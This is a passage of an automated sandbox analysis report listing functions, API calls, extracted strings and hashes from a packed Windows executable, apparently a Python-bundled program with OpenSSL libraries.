                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448927188.00007FFD93BF0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C9E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CA2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D01000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D04000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93bf0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 349153199-0
                                                                                                                                                                                                                                    • Opcode ID: d9075fb2b0ba11a0ca4eca901d47b6c9aa6f7dca5772fbcecca27907c885e73c
                                                                                                                                                                                                                                    • Instruction ID: 7f6d33b5923e7d967c8875fd98c844651fcdfe0f500e238304994eb92b8db478
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9075fb2b0ba11a0ca4eca901d47b6c9aa6f7dca5772fbcecca27907c885e73c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9781C328F0C64346FA74BBE5D4712BD6698AF85788F94A135D9CC7B3A6DE3CE8458300
                                                                                                                                                                                                                                    Function 00007FF7B2B76290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: -$:$f$p$p
                                                                                                                                                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                    • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                    • Instruction ID: af3f2916eab9aafb0fe3373c4df90f5f9c00b436f1e23828c0880fae189e5125
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0129461E0A24386FB667E1CD1442BBB661EB6A750FC44139D789465ECFFBCE580CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B70FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: f$f$p$p$f
                                                                                                                                                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                    • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                    • Instruction ID: 22e67fd42674f0cccf0046000ddafa029f34ea604b410958f3ab441c39dc7805
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6126161E2E14385FB257E1C905467BA6A1FB62750FD88035D79A469ECEFBCE480CB30
                                                                                                                                                                                                                                    Function 00007FF7B2B61050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                    • Opcode ID: 5e66ead2c911d9123970d0edd9d032ddcdfaabb90027aae346dac254b99e7862
                                                                                                                                                                                                                                    • Instruction ID: 445a8fa38f2869c8095a6fc2133a46372657e1fb45ad5f4d2ee38170357cd616
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e66ead2c911d9123970d0edd9d032ddcdfaabb90027aae346dac254b99e7862
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0417321A1A55281EA17FB1998046BBF3A0BF66B84FC44431EF0C8779DEEBCE541C754
                                                                                                                                                                                                                                    Function 00007FFD93D141D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastsetsockopt
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                                                                                                                                                                                                    • API String ID: 1729277954-1872632005
                                                                                                                                                                                                                                    • Opcode ID: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
                                                                                                                                                                                                                                    • Instruction ID: 613ad9b1f10f00fa0c781a19894f3c6116e1b8a4791b29dae2bfe9cc2a178d0c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD519F71B0854286F7309FE2E8246BA7368FB82788F448235EA5C17A96CF3DE555CB41
                                                                                                                                                                                                                                    Function 00007FF7B2B68660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(?,?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B68704
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6870A
                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6874C
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68830: GetEnvironmentVariableW.KERNEL32(00007FF7B2B6388E), ref: 00007FF7B2B68867
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B2B68889
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B78251
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62810: MessageBoxW.USER32 ref: 00007FF7B2B628EA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                    • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                    • Opcode ID: 66c90a5d53ac47f43424169854e846cd906a20bcd121c62903de4a8bc628b946
                                                                                                                                                                                                                                    • Instruction ID: 093af77840f8d4d39685e86d7ea05eef8b0997deeb2c615fd80b986a5536432a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66c90a5d53ac47f43424169854e846cd906a20bcd121c62903de4a8bc628b946
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F419211A1B64280F917B72D98552BBD261AF66780FC04532DF0D8B7AEFEBCE505C224
                                                                                                                                                                                                                                    Function 00007FFD93D11D48 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule$AddressProc
                                                                                                                                                                                                                                    • String ID: OPENSSL_Applink$OPENSSL_Uplink(%p,%02X): $_ssl.pyd$_ssl_d.pyd
                                                                                                                                                                                                                                    • API String ID: 1883125708-1130596517
                                                                                                                                                                                                                                    • Opcode ID: c4aead17072fba216eea99f021f7cf45f47fd7f2a5a9cbf259b3f8ced4e703a5
                                                                                                                                                                                                                                    • Instruction ID: 9b1e1db616bba8bcc7f0be3a5f4cdaab8b4810bd37ac291f2b6d80db7d399b0b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4aead17072fba216eea99f021f7cf45f47fd7f2a5a9cbf259b3f8ced4e703a5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51515A21F0CB4281F6718FA4E86427533A4FF69764B069B35D96C222A6EF7CF190D304
                                                                                                                                                                                                                                    Function 00007FFD93D123D3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                                                                                                                                                                                                    • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                                                                                    • API String ID: 1944374717-1672312481
                                                                                                                                                                                                                                    • Opcode ID: b0e2507b54a2fee0f286af568643ff84d15fb4472f624db1291a1182b8891a4e
                                                                                                                                                                                                                                    • Instruction ID: f6e6b92479419d212f41f4e6439a0d5baadd9eb92f74855aa8075fc14eb63b85
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0e2507b54a2fee0f286af568643ff84d15fb4472f624db1291a1182b8891a4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7415C22B08A8296EB309FE598A02B92394EF497B4B449734E97D57BE5DF3CE5048300
                                                                                                                                                                                                                                    Function 00007FF7B2B6EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                                    • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                    • Instruction ID: 23daf4a7cd6240d1c1b03808ed336db263f652e9377165b83e0f2c1598caad09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57D1C22290974286EB22AF6994807AEF7A0FB66788F440135DF4D9779DEF78E042C714
                                                                                                                                                                                                                                    Function 00007FF7B2B7ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE8C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE98
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                    • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                    • Instruction ID: 30eefac5b35745a67b1a957fa5a0ed03e842d405244f33a7870cf7a1797b0eb3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E41F82171A60181EA57BB1E9804577A291BF6AB90FC84539DE1D873ACFEBCE406C321
                                                                                                                                                                                                                                    Function 00007FF7B2B62C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
